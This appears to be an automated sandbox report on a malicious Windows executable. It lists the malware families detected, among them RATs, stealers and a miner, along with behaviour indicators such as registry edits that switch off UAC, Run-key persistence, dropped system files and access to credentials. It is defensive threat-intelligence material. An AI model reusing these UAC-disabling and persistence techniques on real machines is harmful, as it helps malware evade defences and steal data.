Analysis Overview
SHA256
37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
Threat Level: Known bad
The file RIP_YOUR_PC_LOL.exe was found to be: Known bad.
Malicious Activity Summary
Dcrat family
Purplefox family
AsyncRat
Azorult
Fickerstealer family
NanoCore
Raccoon
njRAT/Bladabindi
Process spawned unexpected child process
Blackmoon family
Azorult family
Raccoon Stealer V1 payload
DcRat
Raccoon family
Redline family
Gh0strat family
Pony family
HawkEye
UAC bypass
Fickerstealer
PurpleFox
Detect Blackmoon payload
xmrig
Njrat family
Hawkeye family
Asyncrat family
Gh0strat
Pony,Fareit
Xmrig family
RedLine
Oski family
Gh0st RAT payload
Nanocore family
Oski
Blackmoon, KrBanker
Detect PurpleFox Rootkit
Detected Nirsoft tools
Async RAT payload
NirSoft WebBrowserPassView
NirSoft MailPassView
XMRig Miner payload
DCRat payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Modifies Windows Firewall
Drops file in Drivers directory
Sets service image path in registry
Downloads MZ/PE file
Server Software Component: Terminal Services DLL
Uses the VBS compiler for execution
Executes dropped EXE
Reads data files stored by FTP clients
Checks BIOS information in registry
Impair Defenses: Safe Mode Boot
Checks computer location settings
Loads dropped DLL
Drops startup file
Unexpected DNS network traffic destination
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Indicator Removal: File Deletion
Enumerates connected drives
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Checks whether UAC is enabled
Accesses Microsoft Outlook accounts
Checks installed software on the system
Adds Run key to start application
Checks system information in the registry
Suspicious use of SetThreadContext
UPX packed file
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
System Network Configuration Discovery: Internet Connection Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Program crash
Browser Information Discovery
Suspicious behavior: LoadsDriver
System policy modification
Modifies system certificate store
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
NTFS ADS
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
outlook_win_path
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Runs ping.exe
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-04 19:14
Signatures
Blackmoon family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nanocore family
Njrat family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-04 19:14
Reported
2024-12-04 19:16
Platform
win7-20240903-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
AsyncRat
Asyncrat family
Azorult
Azorult family
Blackmoon family
Blackmoon, KrBanker
DcRat
Dcrat family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect PurpleFox Rootkit
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fickerstealer
Fickerstealer family
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gh0strat
Gh0strat family
HawkEye
Hawkeye family
NanoCore
Nanocore family
Njrat family
Oski
Oski family
Pony family
Pony,Fareit
PurpleFox
Purplefox family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
Redline family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
Xmrig family
njRAT/Bladabindi
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\QAssist.sys | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\259437400.txt" | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TXPlatforn = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\TXPlatforn.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Documents and Settings\\taskhost.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ISS Host = "C:\\Program Files (x86)\\ISS Host\\isshost.exe" | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Uninstall Information\\sppsvc.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\KBDVNTC\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0fd7de5367376231a788872005d7ed4f = "\"C:\\Program Files\\Windows Portable Devices\\0fd7de5367376231a788872005d7ed4f.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a = "\"C:\\Users\\Admin\\AppData\\Roaming\\8f1c8b40c7be588389a8d382040b23bb\\a.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\ProgramData\\Start Menu\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Start Menu\dllhost.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\259437400.txt | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\SysWOW64\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ini.ini | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File created | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File created | C:\Windows\System32\KBDVNTC\lsass.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\System32\KBDVNTC\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9 | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\ISS Host\isshost.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Uninstall Information\sppsvc.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Uninstall Information\0a1fd5f707cd16ea89afd3d6db52b2da58214a6c | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files (x86)\ISS Host\isshost.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\81a075a9bdba30e81d300eb5cd970ab17cef3e5f | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Cursors\TrustedInsteller.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render_New.dll | C:\Windows\SysWOW64\svchost.exe | N/A |
| File created | C:\Windows\Help\Winlogon.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render.dll | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Cursors\WUDFhosts.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Cursors\KillProcc.sys | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Help\Winlogon.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Help\Winlogon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\HD____11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
